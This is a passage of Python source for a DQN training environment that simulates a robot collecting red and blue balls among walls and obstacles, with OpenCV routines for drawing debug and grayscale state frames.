rospkg\n\n# from sensor_msgs.msg import Image\n# from geometry_msgs.msg import Vector3\n# from tt_core_msgs.msg import Vector3DArray, ImagePoint\n# from cv_bridge import CvBridge, CvBridgeError\n# from sensor_msgs.msg import CompressedImage\n\n# Simulator -----------------------------------------------------------------------------------\nsimulator = {\"width\":31, \"height\":31, \"center\":15, \"resol\":2} # Will be used as input to the policy network\n# resol = # Zoom out the view\n\nmap_param = {\"width\":30, \"height\":50, \"center\":25, \"resol\":1, \"scale\":5} # Size of the map (Should be same with real one?)\n# resol = \n# scale = ???\n\ntrans_scale = int(simulator[\"resol\"]/map_param[\"resol\"]) # Zoom out the view\n\n# Settings for simulator ----------------------------------------------------------------------\nback_pixels = 4 # number of pixels behind (In simulator scale)\nback_pixels_map = back_pixels*trans_scale # (In map scale)\n\ndebug_scale = 10 # Scale up debug window for visualization\nDEBUG_SCALE_WIT = 10 # Scale up my debug window\nDEBUG_SCALE_ENV = 10\ndebug_scale_gray = 10\n\n# Robot parameters ----------------------------------------------------------------------------\n# In map scale\n#\n# COLLECT_X\n# | |\n# _______________ ___\n# | collect |\n# | region | COLLECT_Y Not finished yet\n# |_______________| ___\n# +---------------+\n# | |\n# | |\n# | |\n# | + | ---\n# | |\n# | | R_Y\n# | |\n# +---------------+ ---\n# | R_X |\n\nrot_scale = 5 # Rotation step (in degree)\ncamera_fov = 78 # In degree\nball_blind_slope = 1/np.tan(camera_fov/2*np.pi/180)\nball_blind_bias = 1 # In simulator scale\nball_blind_bias_map = 1.5 # in map scale\nx_disable_move = 4 # In map scale (Shown using green line)\ny_disable_move = 5 # in map scale\nR_BALL = 0.75\nR_X = 1.5\nR_Y = 2.5\nCOLLECT_X = 1.5\nCOLLECT_Y = 1\n\n## 5cm per 1 map pixel ## when simulator resol is 3, 15cm per 1 simulator pixel \nmargin = 4 ## MARGIN \nball_margin = 10\nRan_wall = 20 # random lengthen wall size (늘어난 벽의 길이)\nobstacle_base = 2/5*map_param[\"height\"] ## \nobstacle_length = int(2/5*map_param[\"width\"]) ##\n\n# DQN -----------------------------------------------------------------------------------------\nmax_iter = 1000 # Why only 99?\nreward_region_x = [-1,0,1] # In simulator scale\nreward_region_y = 3 # In simulator scale\n\n# We also want to train the sorting plate so that it can move properly when it detect the color of the ball\nsorting_plate_state_dic = {'NULL': 0, 'RED': 1, 'BLUE': 2}\n\nclass Task:\n def __init__(self, debug_flag=False, test_flag=False, state_blink=True, state_inaccurate=True):\n # This is in simulator scale\n self.frame = np.zeros((simulator[\"height\"], simulator[\"width\"], 1), np.uint8)\n self.frame_gray = np.zeros((simulator[\"height\"]*debug_scale_gray, simulator[\"width\"]*debug_scale_gray, 1), np.uint8)\n # This is in map scale\n self.balls = []\n self.index_prev = -1 # Add by myself\n self.red_balls = []\n self.blue_balls = []\n self.red_balls_prev = []\n self.blue_balls_prev = []\n self.obstacles = []\n # For ...\n self.episode_rewards = []\n self.score = 0\n self.iter = 0\n self.sorting_plate_state = sorting_plate_state_dic['RED']\n self.num_state_after_pick = 0\n self.done = False\n # For ...\n self.write_flag = False\n self.debug_flag = debug_flag\n self.test_flag = test_flag\n self.ball_inscreen_flag = 0\n self.state_blink = state_blink\n self.state_inaccurate = state_inaccurate\n # DQN parameters\n self.observation_space = self.frame_gray.copy()\n self.action_space = np.array(range(12))\n # ROS\n # rospack = rospkg.RosPack()\n # root = rospack.get_path('tt_rl_motion_planner')\n # path = root+\"/config/map_gen.yaml\"\n path = \"./map_gen.yaml\"\n stream = open(path, 'r')\n self._params = yaml.load(stream)\n # Add by myself\n self.current_reward = 0\n return\n\n def reset(self, max_balls=10, max_walls=2):\n self.frame = np.zeros((simulator[\"height\"], simulator[\"width\"], 1), np.uint8)\n self.frame_gray = np.zeros((simulator[\"height\"]*debug_scale_gray, simulator[\"width\"]*debug_scale_gray, 1), np.uint8)\n self.balls = []\n self.index_prev = -1 # Add by myself\n self.red_balls = []\n self.blue_balls = []\n self.red_balls_prev = []\n self.blue_balls_prev = []\n self.obstacles = []\n self.score = 0\n self.iter = 0\n self.sorting_plate_state = sorting_plate_state_dic['RED']\n self.num_state_after_pick = 0\n self.done = False\n self.write_flag = False\n self.ball_inscreen_flag = 0\n\n # 비디오 녹화 주기를 줄여주었다.\n if len(self.episode_rewards)%200 == 0 and not self.test_flag:\n self.write_flag = True\n out_directory = \"data/video/tt.video.\"+format(len(self.episode_rewards)/200,\"08\")+\".mp4\"\n\n if self.test_flag:\n self.write_flag = True\n out_directory = \"data/video_test/tt.video.\"+format(len(self.episode_rewards),\"08\")+\".mp4\"\n\n if self.write_flag:\n codec = cv2.VideoWriter_fourcc(*'mp4v')\n fps = 10\n self.video = cv2.VideoWriter(out_directory, codec, fps, (simulator[\"width\"]*debug_scale,simulator[\"height\"]*debug_scale))\n\n # map_param simulator\n # ^\n # | y\n # +-------------------+\n # | \\ | |\n # | \\i_t| | +----------------+\n # | \\ | | w_h | |\n # | \\ | | | |\n # | \\| | | |\n # | +---------|-----> x +-----------+ | |\n # | | | | | | frame_gray |\n # | | | | | | |\n # | | | | frame | | |\n # | | | | | | |\n # | | | | | | |\n # +-------------------+ +-----------+ +----------------+\n # w_w = frame X debug_scale_gray\n\n # Rotate everything to robot's frame\n # [x'] = [ cos sin][x - r_x]\n # [y'] [-sin cos][y - r_y]\n \n # Create environment (In map scale)\n walls_initial = []\n obstacles_initial = []\n obstacles_temp = []\n i_t = random.random()*np.pi - np.pi/2 # initial random theta, the angle difference with map orientation and car orientation.\n ran_obs = random.random()\n rand_map = random.random()\n\n # if rand_map <= 0.333:\n # # map without walls nor obstacles\n # w_w = map_param[\"width\"]\n # w_h = map_param[\"height\"]\n # r_x = (random.random()-0.5)*(w_w - 2*margin) # initial robot rx map base\n # r_y = -(w_h-2*margin)/2 + random.random()*(obstacle_base-2*margin) # initial robot ry map base\n # walls_initial = []\n # else:\n # if rand_map >= 0.666:\n # # map with walls only\n # w_w = map_param[\"width\"] + round(random.random()*Ran_wall) # random wall width\n # w_h = map_param[\"height\"] + round(random.random()*Ran_wall) # random wall height\n # r_x = (random.random()-0.5)*(w_w - 2*margin) # initial robot rx map base\n # r_y = -(w_h-2*margin)/2 + random.random()*(obstacle_base-2*margin) # initial robot ry map base\n # else:\n # map with walls and obstacles\n w_w = map_param[\"width\"] + round(random.random()*Ran_wall)\n w_h = map_param[\"height\"] + round(random.random()*Ran_wall) + round(obstacle_base)\n r_x = (random.random()-0.5)*(w_w - 2*margin) # initial robot rx map base\n r_y = -(w_h-2*margin)/2 + random.random()*(obstacle_base-2*margin) # initial robot ry map base\n \n # Force debug ------------------------------------------------------------------------\n i_t = 0\n r_x = 0\n r_y = 0\n w_w = map_param[\"width\"]\n w_h = map_param[\"height\"]\n\n for i in range(obstacle_length):\n ox = (-w_w/2) + ran_obs*(w_w - obstacle_length) + i ##obstacle's x coordinate\n obstacles_initial.append([ox, -w_h/2 + obstacle_base]) \n for obstacle in obstacles_initial:\n x = obstacle[0]\n y = obstacle[1]\n t_x = np.cos(i_t)*(x - r_x) + np.sin(i_t)*(y - r_y)\n t_y = -np.sin(i_t)*(x - r_x) + np.cos(i_t)*(y - r_y)\n obstacles_temp.append([t_x, t_y])\n for i in range(w_w):\n cx = -round(w_w/2) + i\n cy = -round(w_h/2)\n walls_initial.append([cx, cy])\n for i in range(w_h):\n cx = -round(w_w/2) + w_w\n cy = -round(w_h/2) + i\n walls_initial.append([cx, cy])\n for i in range(w_w):\n cx = -round(w_w/2) + w_w - i\n cy = -round(w_h/2) + w_h\n walls_initial.append([cx, cy])\n for i in range(w_h):\n cx = -round(w_w/2)\n cy = -round(w_h/2) + w_h - i\n walls_initial.append([cx, cy])\n\n # Rotate everything to robot's frame\n # [x'] = [ cos sin][x - r_x]\n # [y'] [-sin cos][y - r_y]\n for wall in walls_initial:\n x = wall[0]\n y = wall[1]\n f_x = np.cos(i_t)*(x - r_x) + np.sin(i_t)*(y - r_y)\n f_y = -np.sin(i_t)*(x - r_x) + np.cos(i_t)*(y - r_y)\n obstacles_temp.append([f_x, f_y])\n\n for obstacle in obstacles_temp:\n cx = obstacle[0]\n cy = obstacle[1]\n self.obstacles.append([cx, cy])\n ##################### End of the Map constructing ###################\n\n # Place balls randomly\n for i in range(max_balls):\n cx = int(1.0*(2*random.random() - 1)*(w_w/2 - margin)) ## ball x-cor \n cy = int(-w_h/2 + obstacle_base + margin + random.random()*(w_h - obstacle_base - 2*margin)) ##ball y-cor\n f_x = np.cos(i_t)*(cx - r_x) + np.sin(i_t)*(cy - r_y)\n f_y = -np.sin(i_t)*(cx - r_x) + np.cos(i_t)*(cy - r_y)\n insert = True\n for b in self.red_balls:\n if (b[0]-f_x)*(b[0]-f_x) + (b[1]-f_y)*(b[1]-f_y) < (ball_margin)*(ball_margin): ##ball margin\n insert = False\n break\n for b in self.blue_balls:\n if (b[0]-f_x)*(b[0]-f_x) + (b[1]-f_y)*(b[1]-f_y) < (ball_margin)*(ball_margin):\n insert = False\n break\n if insert:\n if i < max_balls/2:\n self.red_balls.append([f_x,f_y])\n else:\n self.blue_balls.append([f_x,f_y])\n self.draw_state()\n\n return self.frame_gray\n\n def check_window_map(self, cx, cy):\n inscreen = True\n if cx < 0 or cx >= map_param[\"width\"]:\n inscreen = False\n if cy < 0 or cy >= map_param[\"height\"]:\n inscreen = False\n return inscreen\n\n def check_window_state(self, cx, cy):\n inscreen = True\n if cx < 0 or cx >= simulator[\"width\"]:\n inscreen = False\n if cy < 0 or cy >= simulator[\"height\"]:\n inscreen = False\n return inscreen\n\n def draw_debug_frame(self, frame):\n frame_debug = np.zeros((simulator[\"height\"]*debug_scale, simulator[\"width\"]*debug_scale, 3), np.uint8)\n # For reference\n\n # cv.rectangle\n # img Image.\n # pt1 Vertex of the rectangle.\n # pt2 Vertex of the rectangle opposite to pt1 .\n # color Rectangle color or brightness (grayscale image).\n # thickness Thickness of lines that make up the rectangle.\n # Negative values, like FILLED, mean that the function has to draw a filled rectangle.\n\n # cv.line\n # img Image.\n # pt1 First point of the line segment.\n # pt2 Second point of the line segment.\n # color Line color.\n # thickness Line thickness.\n # lineType Type of the line. See LineTypes.\n # shift Number of fractional bits in the point coordinates.\n \n # Draw the grid\n for i in range(1, simulator[\"width\"]):\n # Vertical grid\n cv2.line(frame_debug,\n (i*debug_scale, 0),\n (i*debug_scale, simulator[\"height\"]*debug_scale - 1),\n (50, 50, 50),\n 1)\n # Horizontal grid\n cv2.line(frame_debug,\n (0, i*debug_scale),\n (simulator[\"width\"]*debug_scale - 1, i*debug_scale),\n (50, 50, 50),\n 1)\n\n # Draw the obstacles\n for i in range(simulator[\"width\"]):\n for j in range(simulator[\"height\"]):\n if frame[i][j] == self._params[\"Map.data.obstacle\"]:\n cv2.rectangle(frame_debug,\n (i*debug_scale, j*debug_scale),\n ((i + 1)*debug_scale - 1, (j + 1)*debug_scale - 1),\n (255, 255, 0),\n -1)\n if frame[i][j] == self._params[\"Map.data.red_ball\"]:\n cv2.rectangle(frame_debug,\n (i*debug_scale, j*debug_scale),\n ((i + 1)*debug_scale - 1, (j + 1)*debug_scale - 1),\n (0, 0, 255),\n -1)\n # cv2.line(frame_debug,\n # ((simulator[\"center\"])*debug_scale - 1, (simulator[\"height\"] - back_pixels)*debug_scale),\n # (i*debug_scale, j*debug_scale),\n # (0, 0, 255),\n # 1)\n if frame[i][j] == self._params[\"Map.data.blue_ball\"]:\n cv2.rectangle(frame_debug,\n (i*debug_scale, j*debug_scale),\n ((i + 1)*debug_scale - 1, (j + 1)*debug_scale - 1),\n (255, 0, 0),\n -1)\n # cv2.line(frame_debug,\n # ((simulator[\"center\"])*debug_scale - 1, (simulator[\"height\"] - back_pixels)*debug_scale),\n # (i*debug_scale, j*debug_scale),\n # (255, 0, 0),\n # 1)\n \n # Center of the robot\n cv2.rectangle(frame_debug,\n (simulator[\"center\"]*debug_scale - 1, (simulator[\"height\"] - back_pixels)*debug_scale + 1),\n ((simulator[\"center\"] + 1)*debug_scale, (simulator[\"height\"] - (back_pixels - 1))*debug_scale - 1),\n (255, 0, 0) if self.sorting_plate_state == sorting_plate_state_dic['BLUE'] else (0, 0, 255),\n -1)\n # Boundary of the robot\n cv2.rectangle(frame_debug,\n ((simulator[\"center\"] - 1)*debug_scale - 1, (simulator[\"height\"] - (back_pixels + 2))*debug_scale + 1),\n ((simulator[\"center\"] + 2)*debug_scale, (simulator[\"height\"] - (back_pixels - 3))*debug_scale - 1),\n (0, 0, 255),\n 2)\n # Right line view angle\n cv2.line(frame_debug,\n ((simulator[\"center\"] + ball_blind_bias)*debug_scale, (simulator[\"height\"] - back_pixels)*debug_scale - 1),\n (simulator[\"width\"]*debug_scale - 1, ((simulator[\"height\"] - back_pixels) - int(ball_blind_slope*(simulator[\"center\"] - 1 - ball_blind_bias)))*debug_scale),\n (128, 128, 128),\n 1)\n # Left line view angle\n cv2.line(frame_debug,\n ((simulator[\"center\"] - ball_blind_bias + 1)*debug_scale, (simulator[\"height\"] - back_pixels)*debug_scale - 1),\n (0, (simulator[\"height\"] - back_pixels - int(ball_blind_slope*(simulator[\"center\"] - 1 - ball_blind_bias)))*debug_scale),\n (128, 128, 128),\n 1)\n # Text\n cv2.putText(frame_debug,\n \"Step \" + str(self.iter),\n (int(simulator[\"width\"]*debug_scale*0.05), int(simulator[\"width\"]*debug_scale*0.05)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*debug_scale,\n (255, 255, 255))\n cv2.putText(frame_debug,\n \"Score \" + str(self.score),\n (int(simulator[\"width\"]*debug_scale*0.05), int(simulator[\"width\"]*debug_scale*0.10)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*debug_scale,\n (255, 255, 255))\n cv2.putText(frame_debug,\n \"Reward \" + str(self.current_reward),\n (int(simulator[\"width\"]*debug_scale*0.05), int(simulator[\"width\"]*debug_scale*0.15)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*debug_scale,\n (255, 255, 255))\n\n return frame_debug\n \n def draw_environment(self):\n \"\"\"\n Draw:\n - Every thing stored in map_param, scaled up with DEBUG_SCALE_WIT\n - Path to the nearest seeable ball\n \"\"\"\n spare = 2\n frame_env = np.zeros((map_param[\"height\"]*DEBUG_SCALE_ENV*spare, map_param[\"width\"]*DEBUG_SCALE_ENV*spare, 3), np.uint8)\n f_cx = frame_env.shape[1]/2\n f_cy = frame_env.shape[0]/2\n # cv.drawMarker\n # img Image.\n # position\t The point where the crosshair is positioned.\n # color Line color.\n # markerType The specific type of marker you want to use, see MarkerTypes\n # markerSize The length of the marker axis [default = 20 pixels]\n # thickness Line thickness.\n # line_type Type of the line, See LineTypes\n\n # cv.circle\n # img Image where the circle is drawn.\n # center\t Center of the circle.\n # radius\t Radius of the circle.\n # color Circle color.\n # thickness\t Thickness of the circle outline, if positive. Negative values, like FILLED, mean that a filled circle is to be drawn.\n # lineType\t Type of the circle boundary. See LineTypes\n # shift\t Number of fractional bits in the coordinates of the center and in the radius value.\n \n # Vertical grid\n for i in range(1, spare*map_param[\"width\"]):\n cv2.line(frame_env,\n (i*DEBUG_SCALE_ENV, 0),\n (i*DEBUG_SCALE_ENV, map_param[\"height\"]*DEBUG_SCALE_ENV*spare - 1),\n (30, 30, 30),\n 1)\n # Horizontal grid\n for i in range(1, spare*map_param[\"height\"]):\n cv2.line(frame_env,\n (0, i*DEBUG_SCALE_ENV),\n (map_param[\"width\"]*DEBUG_SCALE_ENV*spare - 1, i*DEBUG_SCALE_ENV),\n (30, 30, 30),\n 1)\n # Center of the robot\n cv2.drawMarker(frame_env,\n (int(round(f_cx)), int(round(f_cy))),\n (0, 255, 0),\n cv2.MARKER_CROSS,\n 10)\n # Movable region\n cv2.rectangle(frame_env,\n (int(round(f_cx + R_X*DEBUG_SCALE_ENV)), int(round(f_cy - R_Y*DEBUG_SCALE_ENV))),\n (int(round(f_cx - R_X*DEBUG_SCALE_ENV)), int(round(f_cy + R_Y*DEBUG_SCALE_ENV))),\n (0, 255, 0),\n 1,\n 1)\n # Right line view angle\n cv2.line(frame_env,\n (int(round(f_cx + (ball_blind_bias_map)*DEBUG_SCALE_ENV)), int(round(f_cy))),\n (frame_env.shape[1], int(round(f_cy - ball_blind_slope*(f_cx - ball_blind_bias_map*DEBUG_SCALE_ENV)))),\n (128, 128, 128),\n 1)\n # Left line view angle\n cv2.line(frame_env,\n (int(round(f_cx - (ball_blind_bias_map)*DEBUG_SCALE_ENV)), int(round(f_cy))),\n (0, int(round(f_cy - ball_blind_slope*(f_cx - ball_blind_bias_map*DEBUG_SCALE_ENV)))),\n (128, 128, 128),\n 1)\n # Wall\n for obstacle in self.obstacles:\n cv2.drawMarker(frame_env,\n (int(round(f_cx + (obstacle[0])*DEBUG_SCALE_ENV)), int(round(f_cy - (obstacle[1])*DEBUG_SCALE_ENV))),\n (255, 255, 0),\n cv2.MARKER_DIAMOND,\n 5,\n 1)\n # Red balls\n for ball in self.red_balls:\n cv2.circle(frame_env,\n (int(round(f_cx + ball[0]*DEBUG_SCALE_ENV)), int(round(f_cy - (ball[1])*DEBUG_SCALE_ENV))),\n int(round(R_BALL*DEBUG_SCALE_ENV)),\n (0, 0, 255),\n -1)\n # Blue balls\n for ball in self.blue_balls:\n cv2.circle(frame_env,\n (int(round(f_cx + ball[0]*DEBUG_SCALE_ENV)), int(round(f_cy - (ball[1])*DEBUG_SCALE_ENV))),\n int(round(R_BALL*DEBUG_SCALE_ENV)),\n (255, 0, 0),\n -1)\n \n ball_list = self.red_balls + self.blue_balls\n if ball_list:\n ball_distances = np.sum(np.asarray(ball_list)**2, axis=1)\n sorted_indices = np.argsort(ball_distances)\n for index in sorted_indices:\n if in_camera_range(ball_list[index]) and no_wall_blocking([0, 0], ball_list[index], self.obstacles):\n if index < len(self.red_balls):\n cv2.line(frame_env,\n (int(round(f_cx)), int(round(f_cy))),\n (int(round(f_cx + self.red_balls[index][0]*DEBUG_SCALE_ENV)), int(round(f_cy - self.red_balls[index][1]*DEBUG_SCALE_ENV))),\n (0, 0, 255),\n 1)\n break\n else:\n index = index - len(self.red_balls)\n cv2.line(frame_env,\n (int(round(f_cx)), int(round(f_cy))),\n (int(round(f_cx + self.blue_balls[index][0]*DEBUG_SCALE_ENV)), int(round(f_cy - self.blue_balls[index][1]*DEBUG_SCALE_ENV))),\n (255, 0, 0),\n 1)\n break\n \n # Text --------------------------------------------------------------------------------\n cv2.putText(frame_env,\n \"Step \" + str(self.iter),\n (int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.05), int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.05)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*DEBUG_SCALE_ENV,\n (255, 255, 255))\n cv2.putText(frame_env,\n \"Score \" + str(self.score),\n (int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.05), int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.10)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*DEBUG_SCALE_ENV,\n (255, 255, 255))\n cv2.putText(frame_env,\n \"Reward \" + str(self.current_reward),\n (int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.05), int(map_param[\"width\"]*DEBUG_SCALE_ENV*0.15)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.05*DEBUG_SCALE_ENV,\n (255, 255, 255))\n \n return frame_env\n \n def draw_debug_wit(self):\n \"\"\"\n Draw:\n - Every thing stored in map_param, scaled up with DEBUG_SCALE_WIT\n - Path to the nearest seeable ball\n \"\"\"\n frame_env = np.zeros((map_param[\"height\"]*DEBUG_SCALE_WIT, map_param[\"width\"]*DEBUG_SCALE_WIT, 3), np.uint8)\n # cv.drawMarker\n # img Image.\n # position\t The point where the crosshair is positioned.\n # color Line color.\n # markerType The specific type of marker you want to use, see MarkerTypes\n # markerSize The length of the marker axis [default = 20 pixels]\n # thickness Line thickness.\n # line_type Type of the line, See LineTypes\n\n # cv.circle\n # img Image where the circle is drawn.\n # center\t Center of the circle.\n # radius\t Radius of the circle.\n # color Circle color.\n # thickness\t Thickness of the circle outline, if positive. Negative values, like FILLED, mean that a filled circle is to be drawn.\n # lineType\t Type of the circle boundary. See LineTypes\n # shift\t Number of fractional bits in the coordinates of the center and in the radius value.\n \n # Draw the grid\n for i in range(1, map_param[\"width\"]):\n # Vertical grid\n cv2.line(frame_env,\n (i*DEBUG_SCALE_WIT, 0),\n (i*DEBUG_SCALE_WIT, map_param[\"height\"]*DEBUG_SCALE_WIT - 1),\n (30, 30, 30),\n 1)\n # Horizontal grid\n cv2.line(frame_env,\n (0, i*DEBUG_SCALE_WIT),\n (map_param[\"width\"]*DEBUG_SCALE_WIT - 1, i*DEBUG_SCALE_WIT),\n (30, 30, 30),\n 1)\n # Center of the robot\n cv2.drawMarker(frame_env,\n ((map_param[\"center\"])*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n (255, 255, 0),\n cv2.MARKER_CROSS,\n 10)\n # Movable region\n cv2.rectangle(frame_env,\n (int(round((map_param[\"center\"] - (R_X))*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map + R_Y))*DEBUG_SCALE_WIT))),\n (int(round((map_param[\"center\"] + (R_X))*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map - R_Y))*DEBUG_SCALE_WIT))),\n (0, 255, 0),\n 1,\n 1)\n # Right line view angle\n cv2.line(frame_env,\n ((map_param[\"center\"] + ball_blind_bias_map)*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n (map_param[\"width\"]*DEBUG_SCALE_WIT, int(round((map_param[\"height\"] - (back_pixels_map + ball_blind_slope*(map_param[\"center\"] - ball_blind_bias_map)))*DEBUG_SCALE_WIT))),\n (128, 128, 128),\n 1)\n # Left line view angle\n cv2.line(frame_env,\n ((map_param[\"center\"] - ball_blind_bias_map)*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n (0, int(round((map_param[\"height\"] - (back_pixels_map + ball_blind_slope*(map_param[\"center\"] - ball_blind_bias_map)))*DEBUG_SCALE_WIT))),\n (128, 128, 128),\n 1)\n # Wall\n for obstacle in self.obstacles:\n cv2.drawMarker(frame_env,\n (int(round((map_param[\"center\"] + (obstacle[0]))*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (obstacle[1] + back_pixels_map))*DEBUG_SCALE_WIT))),\n (255, 255, 0),\n cv2.MARKER_DIAMOND,\n 5,\n 1)\n # Red balls\n for ball in self.red_balls:\n cv2.circle(frame_env,\n (int(round((map_param[\"center\"] + (ball[0]))*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (ball[1] + back_pixels_map))*DEBUG_SCALE_WIT))),\n 1*DEBUG_SCALE_WIT,\n (0, 0, 255),\n -1)\n # cv2.line(frame_env,\n # ((map_param[\"center\"])*debug_scale, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n # (int(round((map_param[\"center\"] + ball[0])*debug_scale)), int(round((map_param[\"height\"] - (back_pixels_map + ball[1]))*debug_scale))),\n # (0, 0, 255),\n # 1)\n # Blue balls\n for ball in self.blue_balls:\n cv2.circle(frame_env,\n (int(round((map_param[\"center\"] + (ball[0]))*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (ball[1] + back_pixels_map))*DEBUG_SCALE_WIT))),\n 1*DEBUG_SCALE_WIT,\n (255, 0, 0),\n -1)\n # cv2.line(frame_env,\n # ((map_param[\"center\"])*debug_scale, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n # (int(round((map_param[\"center\"] + ball[0])*debug_scale)), int(round((map_param[\"height\"] - (back_pixels_map + ball[1]))*debug_scale))),\n # (255, 0, 0),\n # 1)\n \n ball_list = self.red_balls + self.blue_balls\n if ball_list:\n ball_distances = np.sum(np.asarray(ball_list)**2, axis=1)\n sorted_indices = np.argsort(ball_distances)\n for index in sorted_indices:\n if in_camera_range(ball_list[index]) and no_wall_blocking([0, 0], ball_list[index], self.obstacles):\n if index < len(self.red_balls):\n cv2.line(frame_env,\n ((map_param[\"center\"])*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n (int(round((map_param[\"center\"] + self.red_balls[index][0])*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map + self.red_balls[index][1]))*DEBUG_SCALE_WIT))),\n (0, 0, 255),\n 1)\n break\n else:\n index = index - len(self.red_balls)\n cv2.line(frame_env,\n ((map_param[\"center\"])*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n (int(round((map_param[\"center\"] + self.blue_balls[index][0])*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map + self.blue_balls[index][1]))*DEBUG_SCALE_WIT))),\n (255, 0, 0),\n 1)\n break\n\n # Can use funciton, but it's too slow\n # index = get_nearest_seeable_ball_index([0, 0], self.red_balls + self.blue_balls, self.obstacles)\n # if index != -1:\n # if index < len(self.red_balls):\n # print('Draw red')\n # cv2.line(frame_env,\n # ((map_param[\"center\"])*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n # (int(round((map_param[\"center\"] + self.red_balls[index][0])*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map + self.red_balls[index][1]))*DEBUG_SCALE_WIT))),\n # (0, 0, 255),\n # 1)\n # else:\n # index = index - len(self.red_balls)\n # print('Draw blue')\n # cv2.line(frame_env,\n # ((map_param[\"center\"])*DEBUG_SCALE_WIT, (map_param[\"height\"] - back_pixels_map)*DEBUG_SCALE_WIT),\n # (int(round((map_param[\"center\"] + self.blue_balls[index][0])*DEBUG_SCALE_WIT)), int(round((map_param[\"height\"] - (back_pixels_map + self.blue_balls[index][1]))*DEBUG_SCALE_WIT))),\n # (255, 0, 0),\n # 1)\n \n # Text --------------------------------------------------------------------------------\n cv2.putText(frame_env,\n \"Step \" + str(self.iter),\n (int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.05), int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.05)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.1*DEBUG_SCALE_WIT,\n (255, 255, 255))\n cv2.putText(frame_env,\n \"Score \" + str(self.score),\n (int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.05), int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.10)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.1*DEBUG_SCALE_WIT,\n (255, 255, 255))\n cv2.putText(frame_env,\n \"Reward \" + str(self.current_reward),\n (int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.05), int(map_param[\"width\"]*DEBUG_SCALE_WIT*0.15)),\n cv2.FONT_HERSHEY_TRIPLEX,\n 0.1*DEBUG_SCALE_WIT,\n (255, 255, 255))\n \n return frame_env\n\n def draw_state_gray(self):\n gray_color = {\"red_ball\":255, \"blue_ball\":220, \"wall\":100, \"robot\":200, \"robot_padding\":150}\n # 다음 교육에는 sorting plate 상태에 따라 gray에도 표시해줌\n # gray_color = {\"red_ball\":255, \"blue_ball\":220, \"wall\":100, \"robot_red\":200, \"robot_blue\":180, \"robot_padding\":150}\n self.frame_gray = np.zeros((simulator[\"height\"]*debug_scale_gray, simulator[\"width\"]*debug_scale_gray, 1), np.uint8)\n\n for i in range(simulator[\"width\"]):\n for j in range(simulator[\"height\"]):\n if self.frame[i][j] == self._params[\"Map.data.obstacle\"]:\n cv2.rectangle(self.frame_gray,\n (i*debug_scale_gray, j*debug_scale_gray),\n ((i + 1)*debug_scale_gray - 1, (j + 1)*debug_scale_gray - 1),\n gray_color[\"wall\"],\n -1)\n if self.frame[i][j] == self._params[\"Map.data.red_ball\"]:\n cv2.rectangle(self.frame_gray,\n (i*debug_scale_gray, j*debug_scale_gray),\n ((i + 1)*debug_scale_gray - 1, (j + 1)*debug_scale_gray - 1),\n gray_color[\"red_ball\"],\n -1)\n if self.frame[i][j] == self._params[\"Map.data.blue_ball\"]:\n cv2.rectangle(self.frame_gray,\n (i*debug_scale_gray, j*debug_scale_gray),\n ((i + 1)*debug_scale_gray - 1, (j + 1)*debug_scale_gray - 1),\n gray_color[\"blue_ball\"],\n -1)\n # Boundary of the robot (?)\n cv2.rectangle(self.frame_gray,\n ((simulator[\"center\"] - 1)*debug_scale_gray, (simulator[\"height\"] - (back_pixels + 2))*debug_scale_gray + 1),\n ((simulator[\"center\"] + 2)*debug_scale_gray, (simulator[\"height\"] - (back_pixels - 3))*debug_scale_gray - 1),\n gray_color[\"robot_padding\"],\n -1)\n # Center of the robot\n cv2.rectangle(self.frame_gray,\n (simulator[\"center\"]*debug_scale_gray, (simulator[\"height\"] - (back_pixels + 0))*debug_scale_gray + 1),\n ((simulator[\"center\"] + 1)*debug_scale_gray, (simulator[\"height\"] - (back_pixels - 1))*debug_scale_gray - 1),\n gray_color[\"robot\"],\n -1)\n \n # cv2.rectangle(self.frame_gray,\n # (simulator[\"center\"]*debug_scale_gray, (simulator[\"height\"] - (back_pixels + 0))*debug_scale_gray + 1),\n # ((simulator[\"center\"] + 1)*debug_scale_gray, (simulator[\"height\"] - (back_pixels - 1))*debug_scale_gray - 1),\n # gray_color[\"robot_blue\"] if self.sorting_plate_state == sorting_plate_state_dic['BLUE'] else gray_color[\"robot_red\"],\n # -1)\n\n return self.frame_gray\n\n def draw_state(self):\n self.frame = np.zeros((simulator[\"height\"], simulator[\"width\"], 1), np.uint8)\n # Wall\n for obstacle in self.obstacles:\n cx = simulator[\"center\"] + 